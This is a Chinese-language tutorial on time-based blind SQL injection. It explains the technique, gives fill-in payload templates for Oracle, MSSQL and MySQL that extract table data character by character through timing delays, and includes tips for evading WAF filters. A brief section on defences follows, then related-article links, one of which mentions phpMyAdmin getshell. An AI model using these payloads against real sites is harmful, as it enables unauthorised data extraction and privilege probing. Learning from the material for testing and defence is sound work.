SQL注入攻击是业界一种非常流行的攻击方式,是由rfp在1998年《Phrack》杂志第54期上的“NT Web Technology Vulnerabilities”文章中首次提出的。时过境迁,相关SQL注入的技术和工具都进行了不断的发展和演化。目前 SQL注入漏洞已经是信息安全的一大领域,无论是小到个人网站,还是大到电子商务网站,都或多或少的存在SQL注入漏洞。为什么SQL注入漏洞会屡禁不止,原因就在于要想防御SQL注入漏洞,需要对SQL语句、业务流程行为、各种主流数据库相关机制都有较为深入的认识和理解,才能真正做好SQL注入的攻击和防范。

SQL注入和盲注

对于SQL注入的定义和一般的判断方法,无非就是著名的三段式。普通SQL注入是通过构造SQL语句,将敏感信息直接暴露在网页上,有两种方式,一种是通过报错方式,一种是通过union select联合查询方式。普通的SQL注入并不是完美的,一旦开发人员将错误页面进行处理,将unionselect关键字进行过滤,注入将不再有效。其实这种修复方式存在较大的问题。如果是在不采取其他措施的情况下,仅仅更换成统一的错误页面是不能避免SQL注入的,这将会产生一种更高级的SQL注入方式盲注。盲注是通过构造SQL判断语句,通过返回页面的不同将信息判断出来。返回页面有三种:有结果页面、0结果页面和错误过滤页面。只要有其中的两个页面,无论哪两个页面都可以,就可以判断存在注入漏洞。当然,这中间还有一个前提,就是这些不同的页面是由输入到URL中的SQL语句执行的不同造成的。但是普通的盲注也不是绝对有效的,一旦没有两个以上的差异页面,或者不能通过页面的不同来来判断 URL中SQL语句的有效性,此时就要使用基于时间的SQL盲注。基于时间的SQL盲注的特点和使用假设有这么一个文件,无论怎么注入,页面内容都一样,但此文件确实存在注入点。最关键的是通过普通盲注不能得到差异页面,没有差异也就没法进行盲注。为什么没有差异,有这么几种情况:

第一种情况:无论输入什么都只显示无信息页面,例如登陆页面。这种情况下可能只有登录失败页面,错误页面被屏蔽了,并且在没有密码的情况下,登录成功的页面一般情况下也不知道。在这种情况下,有可能基于时间的SQL注入会有效。

第二种情况:无论输入什么都只显示正常信息页面。例如,采集登录用户信息的模块页面。采集用户的 IP、浏览器类型、refer字段、session字段,无论用户输入什么,都显示正常页面。

第三种情况:差异页面不是由输入URL中的SQL语句来决定的。这种情况下,也只能使用基于时间的盲注。

总之,情况有很多种,只要无法通过差异页面来进行一般SQL盲注,基于时间的SQL盲注就都有存在的可能。

Oracle数据库盲注

Oracle中基于时间的盲注主要是使用了DBMS_PIPE.RECEIVE_MESSAGE()函数和CASEWHEN„THEN„语句。下面是一个示例:

5593=(CASE
WHEN
(ASCII(SUBSTRC((SELECT
NVL(CAST([ColumnName]
AS
VARCHAR(4000)),CHR(32)) FROM (SELECT [ColumnName],ROWNUM AS LIMIT FROM (SELECT
DISTINCT([ColumnName]) FROM [TableName])) WHERE LIMIT=[StringIndex]),[CharIndex],1))
[GuessChar])
THENDBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(80)||CHR(71)||CHR(74),5)
ELSE 5593 END)

将[TableName]中的[ColumnName]字段下的所有数据选出,逐一选择每条数据,并且逐一选择每条数据中的每个字符,判断该字符的 ASCII码值是不是大于[GuessChar],如果大于,将等待 5秒,如果不大于将返回 5593,当为 5593时,整个判断条件为真。上面的语句是用来获取指定表指定列中的数据。我们还可以通过使用 user_tab_columns、all_tab_columns、

all_tables和user_tables等表或视图来获取想要的表名和列名。如果是过滤了“”、“”,可以使用 like来进行等价变化.MSSQL数据库盲注

1)普通注入方法

MSSQL中基于时间的盲注主要使用了waitfor delay和if语句。下面是一个示例:

;if(ascii(substring((SELECT top 1 name FROM [DatabaseName]..sysobjects where xtype=Uand name not in(SELECTtop [StringIndex] name FROM [DatabaseName]..sysobjects wherextype=U)),[CharIndex],1))%3E[GuessChar]) waitfor delay 0:0:4--选出[DatabaseName]数据库 sysobjects表中 name字段下的所有数据,并且逐一选择条目,每个条目中的字符逐一进行 ASCII码值的判断,如果大于[GuessChar]中指定的码值,将延迟 4秒钟响应。

2)高级注入方法

除了直接使用延迟函数的方法,MSSQL中还有另外一种方法,简单说就是MSSQL数据库中where子句的执行顺序问题。因为MSSQL数据库使用了CBR技术进行优化,因此where后的子句不一定按照子句的书写顺序来执行,是按照各个子句的复杂度来进行,数据库将先执行复杂度较小的子句,如果各个子句使用and来进行连接,那么较小子句的返回结果为false,导致整体的返回结果为 false,其它高复杂度的语句的结果将无关紧要,导致其它高复杂度的语句免于执行,又因为高复杂的子句消耗时间和系统资源较大,从而缩短系统执行时间。如果 where后面的各个子句不是并列关系,而是依赖关系或递进关系的话,则必须进行特殊处理,如 case when或子查询。

总之,复杂度较小的子句的返回结果的真假,将决定复杂度较大的子句是否执行,也就决定了整个 SQL语句执行下来的返回时间的长短。通过这样一个时间差,即可判断之前复杂度较小的子句是否执行成功。

3)使用示例

如果判断网站是否存在基于时间的盲注,那么可以使用下面的语句:

http://xxx/index.asp?id=1 and (SELECTcount(*) FROM syscolumns AS sys1,syscolumns assys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)0 and 1=1

其中(SELECT count(*) FROM syscolumns AS sys1, syscolumns as sys2,syscolumns AS

sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)0是复杂度较大的子句,1=1

是复杂度较小的语句。1=1返回为真,那么前面复杂度较大的子句将免于执行。整个查询结果将立即返回。如果为 1=2,那数据库将执行复杂度较大的子句,整个查询结果将会有很大的延迟。例如下面的语句可以用来判断当前用户权限是否够用。

http://xxx/index.asp?id=1 and (SELECT count(*) FROM syscolumns AS sys1, syscolumns assys2,syscolumns AS sys3,syscolumns AS sys4,syscolumns AS sys5,syscolumns AS sys6)0 and1=(SELECT IS_MEMBER(sysadmin))

MySQL数据库盲注

MySQL数据库基于时间的盲注在使用延迟函数上可以有两个选择,一个是BENCHMARK(count,expr)函数,一个是 sleep(time)函数。前者通过将 expr语句执行 count次来达到延迟的目的,后者是直接延迟 time时间。例如 benchmark函数的使用,可以写成:

id=1  union  select 1,benchmark(1000000,md5(test)),1 from use where  userid=1 and
ord(substring(username,1,1))=97 /*

也可以写成:

id=1
union
select
if(substring(password,1,1)=A,benchmark(10000000,sha(1)),0)
username,password from cms_users where username = admin/*

使用 sleep函数的示例如下:

8468=IF((ORD(MID((SELECT%20IFNULL(CAST([ColumnName]%20AS%20CHAR),0x20)%20FRO
M%20[DatabaseName].[TableName]%20LIMIT%20[StringIndex],1),[CharIndex],1))%20%3E%20[G
uessChar]),SLEEP([DelayTime]),8468)

其中,为了对付部分 waf防火墙,可以去掉 if关键字,也可以去掉“”、“”等符号,使用 like或 in来进行代替。

防御方法

对付基于时间的 SQL盲注和对付其它类型盲注的方法是一样的,无非是做好三个方面的工作:输入数据的过滤、输出数据的处理、SQL语句访问权限的设置。

返回信息是否进行过滤:仅仅控制返回信息不能完全避免注入漏洞的存在,仅仅是让利用难度大增,可能会相继存在明注、盲注、基于时间的盲注。即使将错误页面重定向,也不一定不能明注,比如说利用 union select走正规输入页面来输出。做好返回信息的过滤只是必要条件而不是充分条件。

连接权限是否为 sa:如果连接权限设置非常严密,那么利用系统表的注入就很难成功,只能通过暴力猜表名猜数据的方式,运气成分很大,但是如果有更新当前数据表的权限,就可以向普通业务表中插入或删除数据。输入数据是否进行过滤:输入数据过滤这部分说起来比较复杂,需要结合 waf、中间件、应用程序三者配合进行过滤,如果过滤严密,SQL注入将非常困难。但在某些特殊业务和某些特殊环境下,不可能将所有的关键字和符号都过滤掉,如果过滤掉,可能会导致业务不可用。

总结

无论对于普通SQL盲注,还是基于时间的SQL盲注,最重要的特点是不同点,只要有不同就能注入。这就是所谓的行不行。数据库的连接用户最好是管理员账号,否则就只能使用暴力破解。这就是所谓的难不难的问题。当然,这些都是在关键字和符号过滤不严的情况下进行的。上面提到的注入方法,也只能几个简单的例子。如果对数据库有足够的了解,可以任意发挥想象去构造 SQL语句来完成特定的功能。

基于时间的 SQL注入研究的更多相关文章

  1. 2019-9-9:渗透测试,基础学习,phpmyadmin getshell方法,基于时间的盲注,基于报错的注入,笔记

    phpmyadmin getshell方法1,查看是否有导入导出设置 show global variables like '%secure-file-priv%';2,如果secure-file-p ...

  2. 详解基于MSSQL “order by”语句报错的SQL注入技术

    SQL注入,又名黑客技术之母,是一种臭名昭著的安全漏洞,由于流毒甚广,已经给网络世界造成了巨大的破坏.当然,对于该漏洞的利用技术,也是花样繁多,如访问存储在数据库中的数据,使用MySQL的load和i ...

  3. 大哥带我们的mysql注入 基于时间的盲注

    ?id= and ,,sleep()) ?id= and ,,sleep()) if语句/if()函数 在基于时间型SQL盲注中,我们经常使用条件语句来判断我们的操作是否正确: ?id= and = ...

  4. 关于SQL注入,你应该知道的那些事

    戴上你的黑帽,现在我们来学习一些关于SQL注入真正有趣的东西.请记住,你们都好好地用这些将要看到的东西,好吗? SQL注入攻击因如下几点而是一种特别有趣的冒险: 1.因为能自动规范输入的框架出现,写出 ...

  5. 2020/1/27代码审计学习之SQL注入漏洞

    PHP代码审计SQL注入漏洞 0x00 首先明确什么是SQL注入,SQL语句必须掌握. 常见的注入总的来说可以分为两大类:数字型和字符型. 这两类中包含了诸如报错注入,宽字节注入,盲注,二次注入,co ...

  6. SQL注入的分类

    基于从服务器接收到的响应    基于错误的SQL注入    联合查询的类型    堆查询注射    SQL盲注        基于布尔SQL盲注        基于时间的SQL盲注        基于 ...

  7. SQL注入小结

    分类学习有利于条理化知识,大致的SQL注入分为三种: 1.BealeanBase 2.TimeBase 3.ErrorBase 1.从最简单的说起,基于布尔类型是最常见的SQL注入方式 select ...

  8. sql注入分类

    Sql注入根据数据提取通道的类型,从服务器接收到的响应等可以分为不同的类型. 基于从服务器接收到的响应 ▲基于错误的SQL注入 ▲联合查询的类型 ▲堆查询注射 ▲SQL盲注 •基于布尔SQL盲注 •基 ...

  9. SQL注入攻击

    SQL注入攻击是黑客对数据库进行攻击的常用手段之一.随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多.但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候, ...

随机推荐

  1. NowCoder--牛可乐发红包脱单ACM赛C_区区区间间间

    题目链接:C_区区区间间间 思路:算贡献,求出每个数为当前最大值时所在的区间个数,和每个数为最小值的区间个数 和这个题有点类似 搭配食用效果更佳 点击这里 #include<bits/stdc+ ...

  2. Spring Boot 与 OAuth2 官方最详细教程

    https://mp.weixin.qq.com/s?__biz=MzU0MDEwMjgwNA==&mid=2247484357&idx=1&sn=73e501de8591e6 ...

  3. 百度地图API示例:使用vue添加删除覆盖物

    1.index.html <script type="text/javascript" src="http://api.map.baidu.com/api?v=2. ...

  4. LOJ#2541 猎人杀

    解:step1:猎人死了之后不下台,而是继续开枪,这样分母不变...... 然后容斥,枚举猎人集合s,钦定他们在1之后死.定义打到1的时候结束,枚举游戏在i轮时结束. 发现式子是一个1 + x + x ...

  5. [agc016B][Colorful Hats]

    题目链接 思路 首先,如果没人说谎那么序列中肯定只有一大一小两种数,假设大的数为x,小的数为y.因为对于每个人只有两种情况,要么自己与除自己外的某个人拥有相同的颜色,此时总颜色数就是这个人所能看到的颜 ...

  6. python简单购物车改进版

    # -*- coding: utf-8 -*- """ ┏┓ ┏┓ ┏┛┻━━━┛┻┓ ┃ ☃ ┃ ┃ ┳┛ ┗┳ ┃ ┃ ┻ ┃ ┗━┓ ┏━┛ ┃ ┗━━━┓ ┃ 神 ...

  7. 斯坦福大学公开课机器学习: machine learning system design | error analysis(误差分析:检验算法是否有高偏差和高方差)

    误差分析可以更系统地做出决定.如果你准备研究机器学习的东西或者构造机器学习应用程序,最好的实践方法不是建立一个非常复杂的系统.拥有多么复杂的变量,而是构建一个简单的算法.这样你可以很快地实现它.研究机 ...

  8. RabbitMQ入门-队列

    先建工程 下一步,输入坐标 下一步,输入工程名 先看一下最终目录 修改pom文件 <?xml version="1.0" encoding="UTF-8" ...

  9. 无法删除foo.length

  10. webDriver文档阅读笔记

    一些雷 浏览器版本和对应的Driver的版本是一一对应的,有时候跑不起来,主要是因为driver和浏览器版本对不上. e.g: chrome和driver版本映射表:https://blog.csdn ...